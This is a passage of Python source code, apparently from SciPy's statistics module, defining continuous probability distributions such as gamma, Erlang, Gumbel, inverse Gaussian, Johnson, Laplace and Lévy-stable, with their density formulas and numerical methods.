raise FitDataError("gamma", lower=floc, upper=np.inf)
if floc != 0:
# Don't do the subtraction in-place, because `data` might be a
# view of the input array.
data = data - floc
xbar = data.mean()
# Three cases to handle:
# * shape and scale both free
# * shape fixed, scale free
# * shape free, scale fixed
if fscale is None:
# scale is free
if f0 is not None:
# shape is fixed
a = f0
else:
# shape and scale are both free.
# The MLE for the shape parameter `a` is the solution to:
# np.log(a) - sc.digamma(a) - np.log(xbar) +
# np.log(data.mean) = 0
s = np.log(xbar) - np.log(data).mean()
func = lambda a: np.log(a) - sc.digamma(a) - s
aest = (3-s + np.sqrt((s-3)**2 + 24*s)) / (12*s)
xa = aest*(1-0.4)
xb = aest*(1+0.4)
a = optimize.brentq(func, xa, xb, disp=0)
# The MLE for the scale parameter is just the data mean
# divided by the shape parameter.
scale = xbar / a
else:
# scale is fixed, shape is free
# The MLE for the shape parameter `a` is the solution to:
# sc.digamma(a) - np.log(data).mean() + np.log(fscale) = 0
c = np.log(data).mean() - np.log(fscale)
a = _digammainv(c)
scale = fscale
return a, floc, scale
gamma = gamma_gen(a=0.0, name='gamma')
class erlang_gen(gamma_gen):
"""An Erlang continuous random variable.
%(before_notes)s
See Also
--------
gamma
Notes
-----
The Erlang distribution is a special case of the Gamma distribution, with
the shape parameter `a` an integer. Note that this restriction is not
enforced by `erlang`. It will, however, generate a warning the first time
a non-integer value is used for the shape parameter.
Refer to `gamma` for examples.
"""
def _argcheck(self, a):
allint = np.all(np.floor(a) == a)
allpos = np.all(a > 0)
if not allint:
# An Erlang distribution shouldn't really have a non-integer
# shape parameter, so warn the user.
warnings.warn(
'The shape parameter of the erlang distribution '
'has been given a non-integer value %r.' % (a,),
RuntimeWarning)
return allpos
def _fitstart(self, data):
# Override gamma_gen_fitstart so that an integer initial value is
# used. (Also regularize the division, to avoid issues when
# _skew(data) is 0 or close to 0.)
a = int(4.0 / (1e-8 + _skew(data)**2))
return super(gamma_gen, self)._fitstart(data, args=(a,))
# Trivial override of the fit method, so we can monkey-patch its
# docstring.
def fit(self, data, *args, **kwds):
return super(erlang_gen, self).fit(data, *args, **kwds)
if fit.__doc__ is not None:
fit.__doc__ = (rv_continuous.fit.__doc__ +
"""
Notes
-----
The Erlang distribution is generally defined to have integer values
for the shape parameter. This is not enforced by the `erlang` class.
When fitting the distribution, it will generally return a non-integer
value for the shape parameter. By using the keyword argument
`f0=<integer>`, the fit method can be constrained to fit the data to
a specific integer shape parameter.
""")
erlang = erlang_gen(a=0.0, name='erlang')
class gengamma_gen(rv_continuous):
r"""A generalized gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gengamma` is:
.. math::
f(x, a, c) = \frac{|c| x^{c a-1} \exp(-x^c)}{\Gamma(a)}
for :math:`x \ge 0`, :math:`a > 0`, and :math:`c \ne 0`.
:math:`\Gamma` is the gamma function (`scipy.special.gamma`).
`gengamma` takes :math:`a` and :math:`c` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, c):
return (a > 0) & (c != 0)
def _pdf(self, x, a, c):
# gengamma.pdf(x, a, c) = abs(c) * x**(c*a-1) * exp(-x**c) / gamma(a)
return np.exp(self._logpdf(x, a, c))
def _logpdf(self, x, a, c):
return np.log(abs(c)) + sc.xlogy(c*a - 1, x) - x**c - sc.gammaln(a)
def _cdf(self, x, a, c):
xc = x**c
val1 = sc.gammainc(a, xc)
val2 = sc.gammaincc(a, xc)
return np.where(c > 0, val1, val2)
def _sf(self, x, a, c):
xc = x**c
val1 = sc.gammainc(a, xc)
val2 = sc.gammaincc(a, xc)
return np.where(c > 0, val2, val1)
def _ppf(self, q, a, c):
val1 = sc.gammaincinv(a, q)
val2 = sc.gammainccinv(a, q)
return np.where(c > 0, val1, val2)**(1.0/c)
def _isf(self, q, a, c):
val1 = sc.gammaincinv(a, q)
val2 = sc.gammainccinv(a, q)
return np.where(c > 0, val2, val1)**(1.0/c)
def _munp(self, n, a, c):
# Pochhammer symbol: sc.pocha,n) = gamma(a+n)/gamma(a)
return sc.poch(a, n*1.0/c)
def _entropy(self, a, c):
val = sc.psi(a)
return a*(1-val) + 1.0/c*val + sc.gammaln(a) - np.log(abs(c))
gengamma = gengamma_gen(a=0.0, name='gengamma')
class genhalflogistic_gen(rv_continuous):
r"""A generalized half-logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genhalflogistic` is:
.. math::
f(x, c) = \frac{2 (1 - c x)^{1/(c-1)}}{[1 + (1 - c x)^{1/c}]^2}
for :math:`0 \le x \le 1/c`, and :math:`c > 0`.
`genhalflogistic` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return c > 0
def _get_support(self, c):
return self.a, 1.0/c
def _pdf(self, x, c):
# genhalflogistic.pdf(x, c) =
# 2 * (1-c*x)**(1/c-1) / (1+(1-c*x)**(1/c))**2
limit = 1.0/c
tmp = np.asarray(1-c*x)
tmp0 = tmp**(limit-1)
tmp2 = tmp0*tmp
return 2*tmp0 / (1+tmp2)**2
def _cdf(self, x, c):
limit = 1.0/c
tmp = np.asarray(1-c*x)
tmp2 = tmp**(limit)
return (1.0-tmp2) / (1+tmp2)
def _ppf(self, q, c):
return 1.0/c*(1-((1.0-q)/(1.0+q))**c)
def _entropy(self, c):
return 2 - (2*c+1)*np.log(2)
genhalflogistic = genhalflogistic_gen(a=0.0, name='genhalflogistic')
class gompertz_gen(rv_continuous):
r"""A Gompertz (or truncated Gumbel) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gompertz` is:
.. math::
f(x, c) = c \exp(x) \exp(-c (e^x-1))
for :math:`x \ge 0`, :math:`c > 0`.
`gompertz` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# gompertz.pdf(x, c) = c * exp(x) * exp(-c*(exp(x)-1))
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return np.log(c) + x - c * sc.expm1(x)
def _cdf(self, x, c):
return -sc.expm1(-c * sc.expm1(x))
def _ppf(self, q, c):
return sc.log1p(-1.0 / c * sc.log1p(-q))
def _entropy(self, c):
return 1.0 - np.log(c) - np.exp(c)*sc.expn(1, c)
gompertz = gompertz_gen(a=0.0, name='gompertz')
class gumbel_r_gen(rv_continuous):
r"""A right-skewed Gumbel continuous random variable.
%(before_notes)s
See Also
--------
gumbel_l, gompertz, genextreme
Notes
-----
The probability density function for `gumbel_r` is:
.. math::
f(x) = \exp(-(x + e^{-x}))
The Gumbel distribution is sometimes referred to as a type I Fisher-Tippett
distribution. It is also related to the extreme value distribution,
log-Weibull and Gompertz distributions.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# gumbel_r.pdf(x) = exp(-(x + exp(-x)))
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return -x - np.exp(-x)
def _cdf(self, x):
return np.exp(-np.exp(-x))
def _logcdf(self, x):
return -np.exp(-x)
def _ppf(self, q):
return -np.log(-np.log(q))
def _stats(self):
return _EULER, np.pi*np.pi/6.0, 12*np.sqrt(6)/np.pi**3 * _ZETA3, 12.0/5
def _entropy(self):
# https://en.wikipedia.org/wiki/Gumbel_distribution
return _EULER + 1.
gumbel_r = gumbel_r_gen(name='gumbel_r')
class gumbel_l_gen(rv_continuous):
r"""A left-skewed Gumbel continuous random variable.
%(before_notes)s
See Also
--------
gumbel_r, gompertz, genextreme
Notes
-----
The probability density function for `gumbel_l` is:
.. math::
f(x) = \exp(x - e^x)
The Gumbel distribution is sometimes referred to as a type I Fisher-Tippett
distribution. It is also related to the extreme value distribution,
log-Weibull and Gompertz distributions.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# gumbel_l.pdf(x) = exp(x - exp(x))
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return x - np.exp(x)
def _cdf(self, x):
return -sc.expm1(-np.exp(x))
def _ppf(self, q):
return np.log(-sc.log1p(-q))
def _logsf(self, x):
return -np.exp(x)
def _sf(self, x):
return np.exp(-np.exp(x))
def _isf(self, x):
return np.log(-np.log(x))
def _stats(self):
return -_EULER, np.pi*np.pi/6.0, \
-12*np.sqrt(6)/np.pi**3 * _ZETA3, 12.0/5
def _entropy(self):
return _EULER + 1.
gumbel_l = gumbel_l_gen(name='gumbel_l')
class halfcauchy_gen(rv_continuous):
r"""A Half-Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfcauchy` is:
.. math::
f(x) = \frac{2}{\pi (1 + x^2)}
for :math:`x \ge 0`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# halfcauchy.pdf(x) = 2 / (pi * (1 + x**2))
return 2.0/np.pi/(1.0+x*x)
def _logpdf(self, x):
return np.log(2.0/np.pi) - sc.log1p(x*x)
def _cdf(self, x):
return 2.0/np.pi*np.arctan(x)
def _ppf(self, q):
return np.tan(np.pi/2*q)
def _stats(self):
return np.inf, np.inf, np.nan, np.nan
def _entropy(self):
return np.log(2*np.pi)
halfcauchy = halfcauchy_gen(a=0.0, name='halfcauchy')
class halflogistic_gen(rv_continuous):
r"""A half-logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halflogistic` is:
.. math::
f(x) = \frac{ 2 e^{-x} }{ (1+e^{-x})^2 }
= \frac{1}{2} \text{sech}(x/2)^2
for :math:`x \ge 0`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# halflogistic.pdf(x) = 2 * exp(-x) / (1+exp(-x))**2
# = 1/2 * sech(x/2)**2
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return np.log(2) - x - 2. * sc.log1p(np.exp(-x))
def _cdf(self, x):
return np.tanh(x/2.0)
def _ppf(self, q):
return 2*np.arctanh(q)
def _munp(self, n):
if n == 1:
return 2*np.log(2)
if n == 2:
return np.pi*np.pi/3.0
if n == 3:
return 9*_ZETA3
if n == 4:
return 7*np.pi**4 / 15.0
return 2*(1-pow(2.0, 1-n))*sc.gamma(n+1)*sc.zeta(n, 1)
def _entropy(self):
return 2-np.log(2)
halflogistic = halflogistic_gen(a=0.0, name='halflogistic')
class halfnorm_gen(rv_continuous):
r"""A half-normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfnorm` is:
.. math::
f(x) = \sqrt{2/\pi} \exp(-x^2 / 2)
for :math:`x >= 0`.
`halfnorm` is a special case of `chi` with ``df=1``.
%(after_notes)s
%(example)s
"""
def _rvs(self):
return abs(self._random_state.standard_normal(size=self._size))
def _pdf(self, x):
# halfnorm.pdf(x) = sqrt(2/pi) * exp(-x**2/2)
return np.sqrt(2.0/np.pi)*np.exp(-x*x/2.0)
def _logpdf(self, x):
return 0.5 * np.log(2.0/np.pi) - x*x/2.0
def _cdf(self, x):
return _norm_cdf(x)*2-1.0
def _ppf(self, q):
return sc.ndtri((1+q)/2.0)
def _stats(self):
return (np.sqrt(2.0/np.pi),
1-2.0/np.pi,
np.sqrt(2)*(4-np.pi)/(np.pi-2)**1.5,
8*(np.pi-3)/(np.pi-2)**2)
def _entropy(self):
return 0.5*np.log(np.pi/2.0)+0.5
halfnorm = halfnorm_gen(a=0.0, name='halfnorm')
class hypsecant_gen(rv_continuous):
r"""A hyperbolic secant continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `hypsecant` is:
.. math::
f(x) = \frac{1}{\pi} \text{sech}(x)
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# hypsecant.pdf(x) = 1/pi * sech(x)
return 1.0/(np.pi*np.cosh(x))
def _cdf(self, x):
return 2.0/np.pi*np.arctan(np.exp(x))
def _ppf(self, q):
return np.log(np.tan(np.pi*q/2.0))
def _stats(self):
return 0, np.pi*np.pi/4, 0, 2
def _entropy(self):
return np.log(2*np.pi)
hypsecant = hypsecant_gen(name='hypsecant')
class gausshyper_gen(rv_continuous):
r"""A Gauss hypergeometric continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gausshyper` is:
.. math::
f(x, a, b, c, z) = C x^{a-1} (1-x)^{b-1} (1+zx)^{-c}
for :math:`0 \le x \le 1`, :math:`a > 0`, :math:`b > 0`, and
:math:`C = \frac{1}{B(a, b) F[2, 1](c, a; a+b; -z)}`.
:math:`F[2, 1]` is the Gauss hypergeometric function
`scipy.special.hyp2f1`.
`gausshyper` takes :math:`a`, :math:`b`, :math:`c` and :math:`z` as shape
parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, b, c, z):
return (a > 0) & (b > 0) & (c == c) & (z == z)
def _pdf(self, x, a, b, c, z):
# gausshyper.pdf(x, a, b, c, z) =
# C * x**(a-1) * (1-x)**(b-1) * (1+z*x)**(-c)
Cinv = sc.gamma(a)*sc.gamma(b)/sc.gamma(a+b)*sc.hyp2f1(c, a, a+b, -z)
return 1.0/Cinv * x**(a-1.0) * (1.0-x)**(b-1.0) / (1.0+z*x)**c
def _munp(self, n, a, b, c, z):
fac = sc.beta(n+a, b) / sc.beta(a, b)
num = sc.hyp2f1(c, a+n, a+b+n, -z)
den = sc.hyp2f1(c, a, a+b, -z)
return fac*num / den
gausshyper = gausshyper_gen(a=0.0, b=1.0, name='gausshyper')
class invgamma_gen(rv_continuous):
r"""An inverted gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invgamma` is:
.. math::
f(x, a) = \frac{x^{-a-1}}{\Gamma(a)} \exp(-\frac{1}{x})
for :math:`x >= 0`, :math:`a > 0`. :math:`\Gamma` is the gamma function
(`scipy.special.gamma`).
`invgamma` takes ``a`` as a shape parameter for :math:`a`.
`invgamma` is a special case of `gengamma` with ``c=-1``.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x, a):
# invgamma.pdf(x, a) = x**(-a-1) / gamma(a) * exp(-1/x)
return np.exp(self._logpdf(x, a))
def _logpdf(self, x, a):
return -(a+1) * np.log(x) - sc.gammaln(a) - 1.0/x
def _cdf(self, x, a):
return sc.gammaincc(a, 1.0 / x)
def _ppf(self, q, a):
return 1.0 / sc.gammainccinv(a, q)
def _sf(self, x, a):
return sc.gammainc(a, 1.0 / x)
def _isf(self, q, a):
return 1.0 / sc.gammaincinv(a, q)
def _stats(self, a, moments='mvsk'):
m1 = _lazywhere(a > 1, (a,), lambda x: 1. / (x - 1.), np.inf)
m2 = _lazywhere(a > 2, (a,), lambda x: 1. / (x - 1.)**2 / (x - 2.),
np.inf)
g1, g2 = None, None
if 's' in moments:
g1 = _lazywhere(
a > 3, (a,),
lambda x: 4. * np.sqrt(x - 2.) / (x - 3.), np.nan)
if 'k' in moments:
g2 = _lazywhere(
a > 4, (a,),
lambda x: 6. * (5. * x - 11.) / (x - 3.) / (x - 4.), np.nan)
return m1, m2, g1, g2
def _entropy(self, a):
return a - (a+1.0) * sc.psi(a) + sc.gammaln(a)
invgamma = invgamma_gen(a=0.0, name='invgamma')
# scale is gamma from DATAPLOT and B from Regress
class invgauss_gen(rv_continuous):
r"""An inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invgauss` is:
.. math::
f(x, \mu) = \frac{1}{\sqrt{2 \pi x^3}}
\exp(-\frac{(x-\mu)^2}{2 x \mu^2})
for :math:`x >= 0` and :math:`\mu > 0`.
`invgauss` takes ``mu`` as a shape parameter for :math:`\mu`.
%(after_notes)s
When :math:`\mu` is too small, evaluating the cumulative distribution
function will be inaccurate due to ``cdf(mu -> 0) = inf * 0``.
NaNs are returned for :math:`\mu \le 0.0028`.
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self, mu):
return self._random_state.wald(mu, 1.0, size=self._size)
def _pdf(self, x, mu):
# invgauss.pdf(x, mu) =
# 1 / sqrt(2*pi*x**3) * exp(-(x-mu)**2/(2*x*mu**2))
return 1.0/np.sqrt(2*np.pi*x**3.0)*np.exp(-1.0/(2*x)*((x-mu)/mu)**2)
def _logpdf(self, x, mu):
return -0.5*np.log(2*np.pi) - 1.5*np.log(x) - ((x-mu)/mu)**2/(2*x)
def _cdf(self, x, mu):
fac = np.sqrt(1.0/x)
# Numerical accuracy for small `mu` is bad. See #869.
C1 = _norm_cdf(fac*(x-mu)/mu)
C1 += np.exp(1.0/mu) * _norm_cdf(-fac*(x+mu)/mu) * np.exp(1.0/mu)
return C1
def _stats(self, mu):
return mu, mu**3.0, 3*np.sqrt(mu), 15*mu
invgauss = invgauss_gen(a=0.0, name='invgauss')
class norminvgauss_gen(rv_continuous):
r"""A Normal Inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `norminvgauss` is:
.. math::
f(x, a, b) = (a \exp(\sqrt{a^2 - b^2} + b x)) /
(\pi \sqrt{1 + x^2} \, K_1(a \sqrt{1 + x^2}))
where :math:`x` is a real number, the parameter :math:`a` is the tail
heaviness and :math:`b` is the asymmetry parameter satisfying
:math:`a > 0` and :math:`|b| <= a`.
:math:`K_1` is the modified Bessel function of second kind
(`scipy.special.k1`).
%(after_notes)s
A normal inverse Gaussian random variable `Y` with parameters `a` and `b`
can be expressed as a normal mean-variance mixture:
`Y = b * V + sqrt(V) * X` where `X` is `norm(0,1)` and `V` is
`invgauss(mu=1/sqrt(a**2 - b**2))`. This representation is used
to generate random variates.
References
----------
O. Barndorff-Nielsen, "Hyperbolic Distributions and Distributions on
Hyperbolae", Scandinavian Journal of Statistics, Vol. 5(3),
pp. 151-157, 1978.
O. Barndorff-Nielsen, "Normal Inverse Gaussian Distributions and Stochastic
Volatility Modelling", Scandinavian Journal of Statistics, Vol. 24,
pp. 1-13, 1997.
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _argcheck(self, a, b):
return (a > 0) & (np.absolute(b) < a)
def _pdf(self, x, a, b):
gamma = np.sqrt(a**2 - b**2)
fac1 = a / np.pi * np.exp(gamma)
sq = np.hypot(1, x) # reduce overflows
return fac1 * sc.k1e(a * sq) * np.exp(b*x - a*sq) / sq
def _rvs(self, a, b):
# note: X = b * V + sqrt(V) * X is norminvgaus(a,b) if X is standard
# normal and V is invgauss(mu=1/sqrt(a**2 - b**2))
gamma = np.sqrt(a**2 - b**2)
sz, rndm = self._size, self._random_state
ig = invgauss.rvs(mu=1/gamma, size=sz, random_state=rndm)
return b * ig + np.sqrt(ig) * norm.rvs(size=sz, random_state=rndm)
def _stats(self, a, b):
gamma = np.sqrt(a**2 - b**2)
mean = b / gamma
variance = a**2 / gamma**3
skewness = 3.0 * b / (a * np.sqrt(gamma))
kurtosis = 3.0 * (1 + 4 * b**2 / a**2) / gamma
return mean, variance, skewness, kurtosis
norminvgauss = norminvgauss_gen(name="norminvgauss")
class invweibull_gen(rv_continuous):
u"""An inverted Weibull continuous random variable.
This distribution is also known as the Fréchet distribution or the
type II extreme value distribution.
%(before_notes)s
Notes
-----
The probability density function for `invweibull` is:
.. math::
f(x, c) = c x^{-c-1} \\exp(-x^{-c})
for :math:`x > 0`, :math:`c > 0`.
`invweibull` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
References
----------
F.R.S. de Gusmao, E.M.M Ortega and G.M. Cordeiro, "The generalized inverse
Weibull distribution", Stat. Papers, vol. 52, pp. 591-619, 2011.
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x, c):
# invweibull.pdf(x, c) = c * x**(-c-1) * exp(-x**(-c))
xc1 = np.power(x, -c - 1.0)
xc2 = np.power(x, -c)
xc2 = np.exp(-xc2)
return c * xc1 * xc2
def _cdf(self, x, c):
xc1 = np.power(x, -c)
return np.exp(-xc1)
def _ppf(self, q, c):
return np.power(-np.log(q), -1.0/c)
def _munp(self, n, c):
return sc.gamma(1 - n / c)
def _entropy(self, c):
return 1+_EULER + _EULER / c - np.log(c)
invweibull = invweibull_gen(a=0, name='invweibull')
class johnsonsb_gen(rv_continuous):
r"""A Johnson SB continuous random variable.
%(before_notes)s
See Also
--------
johnsonsu
Notes
-----
The probability density function for `johnsonsb` is:
.. math::
f(x, a, b) = \frac{b}{x(1-x)} \phi(a + b \log \frac{x}{1-x} )
for :math:`0 <= x < =1` and :math:`a, b > 0`, and :math:`\phi` is the normal
pdf.
`johnsonsb` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _argcheck(self, a, b):
return (b > 0) & (a == a)
def _pdf(self, x, a, b):
# johnsonsb.pdf(x, a, b) = b / (x*(1-x)) * phi(a + b * log(x/(1-x)))
trm = _norm_pdf(a + b*np.log(x/(1.0-x)))
return b*1.0/(x*(1-x))*trm
def _cdf(self, x, a, b):
return _norm_cdf(a + b*np.log(x/(1.0-x)))
def _ppf(self, q, a, b):
return 1.0 / (1 + np.exp(-1.0 / b * (_norm_ppf(q) - a)))
johnsonsb = johnsonsb_gen(a=0.0, b=1.0, name='johnsonsb')
class johnsonsu_gen(rv_continuous):
r"""A Johnson SU continuous random variable.
%(before_notes)s
See Also
--------
johnsonsb
Notes
-----
The probability density function for `johnsonsu` is:
.. math::
f(x, a, b) = \frac{b}{\sqrt{x^2 + 1}}
\phi(a + b \log(x + \sqrt{x^2 + 1}))
for all :math:`x, a, b > 0`, and :math:`\phi` is the normal pdf.
`johnsonsu` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, b):
return (b > 0) & (a == a)
def _pdf(self, x, a, b):
# johnsonsu.pdf(x, a, b) = b / sqrt(x**2 + 1) *
# phi(a + b * log(x + sqrt(x**2 + 1)))
x2 = x*x
trm = _norm_pdf(a + b * np.log(x + np.sqrt(x2+1)))
return b*1.0/np.sqrt(x2+1.0)*trm
def _cdf(self, x, a, b):
return _norm_cdf(a + b * np.log(x + np.sqrt(x*x + 1)))
def _ppf(self, q, a, b):
return np.sinh((_norm_ppf(q) - a) / b)
johnsonsu = johnsonsu_gen(name='johnsonsu')
class laplace_gen(rv_continuous):
r"""A Laplace continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `laplace` is
.. math::
f(x) = \frac{1}{2} \exp(-|x|)
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.laplace(0, 1, size=self._size)
def _pdf(self, x):
# laplace.pdf(x) = 1/2 * exp(-abs(x))
return 0.5*np.exp(-abs(x))
def _cdf(self, x):
return np.where(x > 0, 1.0-0.5*np.exp(-x), 0.5*np.exp(x))
def _ppf(self, q):
return np.where(q > 0.5, -np.log(2*(1-q)), np.log(2*q))
def _stats(self):
return 0, 2, 0, 3
def _entropy(self):
return np.log(2)+1
laplace = laplace_gen(name='laplace')
class levy_gen(rv_continuous):
r"""A Levy continuous random variable.
%(before_notes)s
See Also
--------
levy_stable, levy_l
Notes
-----
The probability density function for `levy` is:
.. math::
f(x) = \frac{1}{\sqrt{2\pi x^3}} \exp\left(-\frac{1}{2x}\right)
for :math:`x >= 0`.
This is the same as the Levy-stable distribution with :math:`a=1/2` and
:math:`b=1`.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x):
# levy.pdf(x) = 1 / (x * sqrt(2*pi*x)) * exp(-1/(2*x))
return 1 / np.sqrt(2*np.pi*x) / x * np.exp(-1/(2*x))
def _cdf(self, x):
# Equivalent to 2*norm.sf(np.sqrt(1/x))
return sc.erfc(np.sqrt(0.5 / x))
def _ppf(self, q):
# Equivalent to 1.0/(norm.isf(q/2)**2) or 0.5/(erfcinv(q)**2)
val = -sc.ndtri(q/2)
return 1.0 / (val * val)
def _stats(self):
return np.inf, np.inf, np.nan, np.nan
levy = levy_gen(a=0.0, name="levy")
class levy_l_gen(rv_continuous):
r"""A left-skewed Levy continuous random variable.
%(before_notes)s
See Also
--------
levy, levy_stable
Notes
-----
The probability density function for `levy_l` is:
.. math::
f(x) = \frac{1}{|x| \sqrt{2\pi |x|}} \exp{ \left(-\frac{1}{2|x|} \right)}
for :math:`x <= 0`.
This is the same as the Levy-stable distribution with :math:`a=1/2` and
:math:`b=-1`.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x):
# levy_l.pdf(x) = 1 / (abs(x) * sqrt(2*pi*abs(x))) * exp(-1/(2*abs(x)))
ax = abs(x)
return 1/np.sqrt(2*np.pi*ax)/ax*np.exp(-1/(2*ax))
def _cdf(self, x):
ax = abs(x)
return 2 * _norm_cdf(1 / np.sqrt(ax)) - 1
def _ppf(self, q):
val = _norm_ppf((q + 1.0) / 2)
return -1.0 / (val * val)
def _stats(self):
return np.inf, np.inf, np.nan, np.nan
levy_l = levy_l_gen(b=0.0, name="levy_l")
class levy_stable_gen(rv_continuous):
r"""A Levy-stable continuous random variable.
%(before_notes)s
See Also
--------
levy, levy_l
Notes
-----
The distribution for `levy_stable` has characteristic function:
.. math::
\varphi(t, \alpha, \beta, c, \mu) =
e^{it\mu -|ct|^{\alpha}(1-i\beta \operatorname{sign}(t)\Phi(\alpha, t))}
where:
.. math::
\Phi = \begin{cases}
\tan \left({\frac {\pi \alpha }{2}}\right)&\alpha \neq 1\\
-{\frac {2}{\pi }}\log |t|&\alpha =1
\end{cases}
The probability density function for `levy_stable` is:
.. math::
f(x) = \frac{1}{2\pi}\int_{-\infty}^\infty \varphi(t)e^{-ixt}\,dt
where :math:`-\infty < t < \infty`. This integral does not have a known closed form.
For evaluation of pdf we use either Zolotarev :math:`S_0` parameterization with integration,
direct integration of standard parameterization of characteristic function or FFT of
characteristic function. If set to other than None and if number of points is greater than
``levy_stable.pdf_fft_min_points_threshold`` (defaults to None) we use FFT otherwise we use one
of the other methods.
The default method is 'best' which uses Zolotarev's method if alpha = 1 and integration of
characteristic function otherwise. The default method can be changed by setting
``levy_stable.pdf_default_method`` to either 'zolotarev', 'quadrature' or 'best'.
To increase accuracy of FFT calculation one can specify ``levy_stable.pdf_fft_grid_spacing``
(defaults to 0.001) and ``pdf_fft_n_points_two_power`` (defaults to a value that covers the
input range * 4). Setting ``pdf_fft_n_points_two_power`` to 16 should be sufficiently accurate
in most cases at the expense of CPU time.
For evaluation of cdf we use Zolatarev :math:`S_0` parameterization with integration or integral of
the pdf FFT interpolated spline. The settings affecting FFT calculation are the same as
for pdf calculation. Setting the threshold to ``None`` (default) will disable FFT. For cdf
calculations the Zolatarev method is superior in accuracy, so FFT is disabled by default.
Fitting estimate uses quantile estimation method in [MC]. MLE estimation of parameters in
fit method uses this quantile estimate initially. Note that MLE doesn't always converge if
using FFT for pdf calculations; so it's best that ``pdf_fft_min_points_threshold`` is left unset.
.. warning::
For pdf calculations implementation of Zolatarev is unstable for values where alpha = 1 and
beta != 0. In this case the quadrature method is recommended. FFT calculation is also
considered experimental.
For cdf calculations FFT calculation is considered experimental. Use Zolatarev's method
instead (default).
%(after_notes)s
References
----------
.. [MC] McCulloch, J., 1986. Simple consistent estimators of stable distribution parameters.
Communications in Statistics - Simulation and Computation 15, 11091136.
.. [MS] Mittnik, S.T. Rachev, T. Doganoglu, D. Chenyao, 1999. Maximum likelihood estimation
of stable Paretian models, Mathematical and Computer Modelling, Volume 29, Issue 10,
1999, Pages 275-293.
.. [BS] Borak, S., Hardle, W., Rafal, W. 2005. Stable distributions, Economic Risk.
%(example)s
"""
def _rvs(self, alpha, beta):
def alpha1func(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W):
return (2/np.pi*(np.pi/2 + bTH)*tanTH -
beta*np.log((np.pi/2*W*cosTH)/(np.pi/2 + bTH)))
def beta0func(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W):
return (W/(cosTH/np.tan(aTH) + np.sin(TH)) *
((np.cos(aTH) + np.sin(aTH)*tanTH)/W)**(1.0/alpha))
def otherwise(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W):
# alpha is not 1 and beta is not 0
val0 = beta*np.tan(np.pi*alpha/2)
th0 = np.arctan(val0)/alpha
val3 = W/(cosTH/np.tan(alpha*(th0 + TH)) + np.sin(TH))
res3 = val3*((np.cos(aTH) + np.sin(aTH)*tanTH -
val0*(np.sin(aTH) - np.cos(aTH)*tanTH))/W)**(1.0/alpha)
return res3
def alphanot1func(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W):
res = _lazywhere(beta == 0,
(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W),
beta0func, f2=otherwise)
return res
sz = self._size
alpha = broadcast_to(alpha, sz)
beta = broadcast_to(beta, sz)
TH = uniform.rvs(loc=-np.pi/2.0, scale=np.pi, size=sz,
random_state=self._random_state)
W = expon.rvs(size=sz, random_state=self._random_state)
aTH = alpha*TH
bTH = beta*TH
cosTH = np.cos(TH)
tanTH = np.tan(TH)
res = _lazywhere(alpha == 1,
(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W),
alpha1func, f2=alphanot1func)
return res
def _argcheck(self, alpha, beta):
return (alpha > 0) & (alpha <= 2) & (beta <= 1) & (beta >= -1)
@staticmethod
def _cf(t, alpha, beta):
Phi = lambda alpha, t: np.tan(np.pi*alpha/2) if alpha != 1 else -2.0*np.log(np.abs(t))/np.pi
return np.exp(-(np.abs(t)**alpha)*(1-1j*beta*np.sign(t)*Phi(alpha, t)))
@staticmethod
def _pdf_from_cf_with_fft(cf, h=0.01, q=9):
"""Calculates pdf from cf using fft. Using region around 0 with N=2**q points
separated by distance h. As suggested by [MS].
"""
N = 2**q
n = np.arange(1,N+1)
density = ((-1)**(n-1-N/2))*np.fft.fft(((-1)**(n-1))*cf(2*np.pi*(n-1-N/2)/h/N))/h/N
x = (n-1-N/2)*h
return (x, density)
@staticmethod
def _pdf_single_value_best(x, alpha, beta):
if alpha != 1. or (alpha == 1. and beta == 0.):
return levy_stable_gen._pdf_single_value_zolotarev(x, alpha, beta)
else:
return levy_stable_gen._pdf_single_value_cf_integrate(x, alpha, beta)
@staticmethod
